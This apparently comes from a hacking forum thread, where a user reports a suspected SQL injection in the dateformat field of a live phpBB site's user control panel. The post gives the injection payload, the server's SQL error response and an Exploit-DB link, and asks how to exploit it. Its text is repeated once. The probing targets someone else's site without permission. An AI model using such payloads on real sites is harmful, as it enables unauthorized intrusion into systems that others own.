SQL Injection dateformat=parameter 08-04-2019, 02:33 PM
#1
I have a specific query regarding a SQL injection ive found in the dateformat parameter of a POST request of a PHPBB forum don't ask what its hosting its strange fetish porn... lol
Its mysql14 ---PHPBB board
POST request to ucp.php --- user control panel
dateformat="a"" or 6=6--" ---- before Burp encodes the payload
Servers Response
HTTP/1.1 503 Service Unavailable
Date: Mon, 29 Jul 2019 19:20:16 GMT
Server: Apache
X-Powered-By: PHP/5.6.29
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2175
<div>SQL ERROR [ mysql4 ]<br /><br />Data too long for column 'user_dateformat' at row 1 [1406]<br /><br />An SQL error occurred while fetching this page. Please contact the <a
I found it on exploit db as well but see no working exploit the link is below
https://www.exploit-db.com/exploits/37551
Its mysql14 ---PHPBB board
POST request to ucp.php --- user control panel
dateformat="a"" or 6=6--" ---- before Burp encodes the payload
Servers Response
HTTP/1.1 503 Service Unavailable
Date: Mon, 29 Jul 2019 19:20:16 GMT
Server: Apache
X-Powered-By: PHP/5.6.29
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2175
<div>SQL ERROR [ mysql4 ]<br /><br />Data too long for column 'user_dateformat' at row 1 [1406]<br /><br />An SQL error occurred while fetching this page. Please contact the <a
I found it on exploit db as well but see no working exploit the link is below
https://www.exploit-db.com/exploits/37551


![[+]](https://sinister.li/images/modern/collapse_collapsed.png)